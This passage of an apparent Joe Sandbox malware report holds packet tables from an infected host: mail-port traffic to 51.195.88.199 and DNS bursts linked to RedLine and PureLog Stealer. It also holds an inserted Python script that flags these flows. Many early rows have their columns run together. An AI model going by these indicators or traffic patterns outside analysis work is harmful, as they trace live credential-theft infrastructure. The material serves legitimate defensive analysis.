                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.214735031 CEST5163480192.168.2.544.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.214760065 CEST5163480192.168.2.544.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.216006041 CEST805163344.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.219544888 CEST805163444.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.219561100 CEST805163444.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.402328968 CEST5163580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.609885931 CEST805163518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.609963894 CEST5163580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.610559940 CEST5163580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.610559940 CEST5163580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.615675926 CEST805163518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.615684032 CEST805163518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.693849087 CEST805163444.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.694088936 CEST5163480192.168.2.544.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.694350958 CEST805163444.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.695244074 CEST5163480192.168.2.544.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.698934078 CEST805163444.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.711565971 CEST5163680192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.716360092 CEST805163644.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.716435909 CEST5163680192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.716574907 CEST5163680192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.716628075 CEST5163680192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.721318960 CEST805163644.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.721373081 CEST805163644.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.085896969 CEST805163518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.085952044 CEST805163518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.086076975 CEST5163580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.086574078 CEST5163580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.091464996 CEST805163518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.185419083 CEST805163644.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.185544014 CEST805163644.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.185658932 CEST5163680192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.185731888 CEST5163680192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.190507889 CEST805163644.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.201078892 CEST5163780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.205971003 CEST805163754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.206207991 CEST5163780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.206207991 CEST5163780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.207370043 CEST5163780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.211250067 CEST805163754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.212243080 CEST805163754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.341813087 CEST5163880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.346605062 CEST805163844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.346668005 CEST5163880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.346963882 CEST5163880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.346992016 CEST5163880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.351707935 CEST805163844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.351748943 CEST805163844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.822458029 CEST805163844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.822583914 CEST805163844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.822659969 CEST5163880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.833231926 CEST51590587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.838129044 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.956712961 CEST805163754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.957015038 CEST805163754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.957166910 CEST5163780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.957166910 CEST5163780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.962080002 CEST805163754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.019049883 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.021703959 CEST51590587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.021986008 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.026784897 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.026963949 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.688433886 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.691416979 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.696294069 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.873665094 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.877556086 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.882407904 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.060930967 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.061604023 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.067251921 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.257772923 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.257791042 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.257805109 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.258428097 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.260555983 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.265539885 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.443058014 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.443986893 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.448827028 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.626385927 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.626743078 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.631531954 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.809524059 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.809767008 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:23.814639091 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.009510040 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.009716034 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.014548063 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.192012072 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.192526102 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.197374105 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.380050898 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.380285978 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.385097980 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.562447071 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.565700054 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.565700054 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.566042900 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.566042900 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.567130089 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.570761919 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.570882082 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.570890903 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.570900917 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.570964098 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.572247982 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.572340012 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.575896025 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.576927900 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.577177048 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.577233076 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.577316046 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.577402115 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.577459097 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.577470064 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.577493906 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.577517986 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.577539921 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.577645063 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.577719927 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.581706047 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.582396984 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.582484961 CEST51639587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.582500935 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.582576990 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.582906008 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.587316036 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.587349892 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.587359905 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.587378025 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.587404013 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.587414026 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.587508917 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.587615013 CEST5875163951.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:24.587625027 CEST5875163951.195.88.199192.168.2.5
Oct 10, 2024 10:09:24.587635994 CEST  587          51639      51.195.88.199    192.168.2.5
Oct 10, 2024 10:09:24.587640047 CEST  587          51639      51.195.88.199    192.168.2.5
Oct 10, 2024 10:09:24.587650061 CEST  587          51639      51.195.88.199    192.168.2.5
Oct 10, 2024 10:09:24.587660074 CEST  587          51639      51.195.88.199    192.168.2.5
Oct 10, 2024 10:09:24.587677002 CEST  587          51639      51.195.88.199    192.168.2.5
Oct 10, 2024 10:09:24.587688923 CEST  587          51639      51.195.88.199    192.168.2.5
Oct 10, 2024 10:09:24.587697983 CEST  587          51639      51.195.88.199    192.168.2.5
Oct 10, 2024 10:09:24.967602968 CEST  587          51639      51.195.88.199    192.168.2.5
Oct 10, 2024 10:09:25.058032990 CEST  51639        587        192.168.2.5      51.195.88.199
Oct 10, 2024 10:09:25.399091005 CEST  51638        80         192.168.2.5      44.221.84.105
Oct 10, 2024 10:09:25.403927088 CEST  80           51638      44.221.84.105    192.168.2.5
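The packet tables on this page are only useful once they are collapsed into flows: the report's signatures above flag RedLine and PureLog Stealer and random-domain DNS queries, and the rows themselves show the analysis host 192.168.2.5 talking to 51.195.88.199 on TCP 587, to 44.221.84.105 on TCP 80, and sending a steady stream of DNS queries to 1.1.1.1. The script below is an added example, not part of the Joe Sandbox report or its tooling. It parses rows in the same timestamp / source port / dest port / source IP / dest IP layout as the tables, aggregates outbound traffic per destination, lists destinations on mail submission ports, and counts DNS queries per time window. The sample rows are copied from the tables on this page; the mail-port list, the burst threshold and the window size are this example's own assumptions and should be tuned to the environment.

```python
"""Turn a Joe Sandbox-style packet list into flows and simple triage flags.

Added example, not part of the Joe Sandbox report. SAMPLE_ROWS is copied from
the TCP and UDP packet tables on the page; MAIL_PORTS, DNS_BURST_THRESHOLD and
DNS_WINDOW_SECONDS are this example's own assumptions.
"""
from collections import Counter
from dataclasses import dataclass
from datetime import datetime
import ipaddress

# Rows taken from the report's packet tables:
# timestamp, source port, dest port, source IP, dest IP.
SAMPLE_ROWS = """\
Oct 10, 2024 10:09:24.587635994 CEST 587 51639 51.195.88.199 192.168.2.5
Oct 10, 2024 10:09:25.058032990 CEST 51639 587 192.168.2.5 51.195.88.199
Oct 10, 2024 10:09:25.399091005 CEST 51638 80 192.168.2.5 44.221.84.105
Oct 10, 2024 10:09:25.403927088 CEST 80 51638 44.221.84.105 192.168.2.5
Oct 10, 2024 10:07:23.342924118 CEST 60560 53 192.168.2.5 1.1.1.1
Oct 10, 2024 10:07:23.532126904 CEST 53 60560 1.1.1.1 192.168.2.5
Oct 10, 2024 10:07:23.601206064 CEST 50082 53 192.168.2.5 1.1.1.1
Oct 10, 2024 10:07:24.782464981 CEST 58586 53 192.168.2.5 1.1.1.1
Oct 10, 2024 10:07:24.969414949 CEST 49261 53 192.168.2.5 1.1.1.1
Oct 10, 2024 10:07:26.768829107 CEST 58568 53 192.168.2.5 1.1.1.1
Oct 10, 2024 10:07:26.772661924 CEST 63464 53 192.168.2.5 1.1.1.1
"""

MAIL_PORTS = {25, 465, 587}   # assumption: mail submission ports worth flagging
DNS_BURST_THRESHOLD = 5       # assumption: more than 5 queries per window is a burst
DNS_WINDOW_SECONDS = 10       # assumption: window size for the DNS burst count
TS_FORMAT = "%b %d, %Y %H:%M:%S.%f"


@dataclass(frozen=True)
class Packet:
    ts: datetime
    sport: int
    dport: int
    src: str
    dst: str


def parse_row(line: str) -> Packet:
    """Parse 'Mon DD, YYYY HH:MM:SS.nnnnnnnnn TZ sport dport src dst'."""
    parts = line.split()
    stamp, frac = " ".join(parts[:4]).rsplit(".", 1)
    # strptime accepts microseconds only, so drop the last three nanosecond digits.
    ts = datetime.strptime(f"{stamp}.{frac[:6]}", TS_FORMAT)
    sport, dport, src, dst = int(parts[5]), int(parts[6]), parts[7], parts[8]
    ipaddress.ip_address(src)  # raise on a mis-split address rather than count it
    ipaddress.ip_address(dst)
    return Packet(ts, sport, dport, src, dst)


def parse_table(text: str) -> list:
    return [parse_row(line) for line in text.splitlines() if line.strip()]


def is_internal(ip: str) -> bool:
    return ipaddress.ip_address(ip).is_private


def outbound_flows(packets) -> Counter:
    """Packets per (dest IP, dest port) that leave an internal host."""
    flows = Counter()
    for p in packets:
        if is_internal(p.src) and not is_internal(p.dst):
            flows[(p.dst, p.dport)] += 1
    return flows


def mail_port_flows(packets) -> list:
    """Outbound destinations on mail ports: the first thing to pull the payload for."""
    return sorted({k for k in outbound_flows(packets) if k[1] in MAIL_PORTS})


def dns_query_bursts(packets) -> dict:
    """Windows in which internal hosts sent more than DNS_BURST_THRESHOLD queries."""
    buckets = Counter()
    for p in packets:
        if p.dport == 53 and is_internal(p.src):
            start = p.ts.replace(
                second=p.ts.second // DNS_WINDOW_SECONDS * DNS_WINDOW_SECONDS,
                microsecond=0)
            buckets[start] += 1
    return {start: n for start, n in buckets.items() if n > DNS_BURST_THRESHOLD}


def triage(packets) -> dict:
    return {
        "outbound_flows": dict(outbound_flows(packets)),
        "mail_port_flows": mail_port_flows(packets),
        "dns_bursts": dns_query_bursts(packets),
    }


if __name__ == "__main__":
    for key, value in triage(parse_table(SAMPLE_ROWS)).items():
        print(f"{key}: {value}")
```

On the sample rows this reports one outbound mail-port destination (51.195.88.199:587), one HTTP destination (44.221.84.105:80) and six DNS queries inside the 10:07:20 window, which is the window to line up against the DNS query list and the "queries random domain names" signature. The flow keys are (destination, port) rather than per-packet because a single 587 connection carrying a submission is the indicator, not the packet count.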
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Oct 10, 2024 10:07:23.342924118 CEST  60560        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:23.532126904 CEST  53           60560      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:23.601206064 CEST  50082        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:23.608179092 CEST  53           50082      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:24.782464981 CEST  58586        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:24.789944887 CEST  53           58586      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:24.969414949 CEST  49261        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:24.976999998 CEST  53           49261      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:26.768829107 CEST  58568        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:26.772661924 CEST  63464        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:26.776401043 CEST  53           58568      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:26.780160904 CEST  53           63464      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:27.805931091 CEST  60885        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:27.813123941 CEST  53           60885      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:27.853192091 CEST  49820        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:27.864829063 CEST  53           49820      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:28.173118114 CEST  55980        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:28.180768967 CEST  53           55980      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:28.326325893 CEST  63299        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:28.333771944 CEST  53           63299      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:29.108968019 CEST  56210        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:29.321170092 CEST  53           56210      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:29.531250000 CEST  63904        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:29.539918900 CEST  53           63904      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:29.544971943 CEST  63907        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:29.552664042 CEST  53           63907      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:30.046320915 CEST  64943        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:30.054842949 CEST  53           64943      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:30.920808077 CEST  61732        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:30.928452969 CEST  53           61732      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:30.931174994 CEST  49725        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:30.938716888 CEST  53           49725      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:30.939405918 CEST  56763        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:30.946038961 CEST  53           56763      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:31.567168951 CEST  64227        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:31.575464010 CEST  53           64227      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:31.577907085 CEST  54745        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:31.584899902 CEST  53           54745      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:33.325433016 CEST  58391        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:33.332683086 CEST  53           58391      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:33.333301067 CEST  53574        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:33.350624084 CEST  53           53574      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:33.351183891 CEST  57327        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:33.361990929 CEST  53           57327      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:45.791235924 CEST  56088        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:45.798940897 CEST  53           56088      1.1.1.1          192.168.2.5
Oct 10, 2024 10:07:56.930687904 CEST  61569        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:07:56.937968969 CEST  53           61569      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:01.023364067 CEST  57706        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:01.030898094 CEST  53           57706      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:04.919292927 CEST  59947        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:04.926546097 CEST  53           59947      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:06.411892891 CEST  62987        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:06.419620991 CEST  53           62987      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:08.041007996 CEST  52065        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:08.048959017 CEST  53           52065      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:09.272866964 CEST  62887        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:09.530653954 CEST  53           62887      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:11.155543089 CEST  64688        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:11.162425041 CEST  53           64688      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:12.695547104 CEST  63207        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:12.703038931 CEST  53           63207      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:13.679730892 CEST  60465        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:13.687570095 CEST  53           60465      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:14.666750908 CEST  61800        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:14.674923897 CEST  53           61800      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:15.599189043 CEST  63523        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:15.606404066 CEST  53           63523      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:18.709276915 CEST  64224        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:18.716517925 CEST  53           64224      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:19.538527012 CEST  50275        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:19.547077894 CEST  53           50275      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:20.788475990 CEST  49349        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:21.017524958 CEST  53           49349      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:22.400291920 CEST  51098        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:22.408539057 CEST  53           51098      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:22.944672108 CEST  59325        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:22.952207088 CEST  53           59325      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:24.992893934 CEST  63224        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:25.000169992 CEST  53           63224      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:25.847407103 CEST  53515        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:25.855870962 CEST  53           53515      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:26.999830961 CEST  62930        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:27.193123102 CEST  53           62930      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:28.120148897 CEST  51316        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:28.127357960 CEST  53           51316      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:29.046667099 CEST  64694        53         192.168.2.5      1.1.1.1
Oct 10, 2024 10:08:29.055116892 CEST  53           64694      1.1.1.1          192.168.2.5
Oct 10, 2024 10:08:30.675142050 CEST  59805        53         192.168.2.5      1.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:30.682223082 CEST53598051.1.1.1192.168.2.5
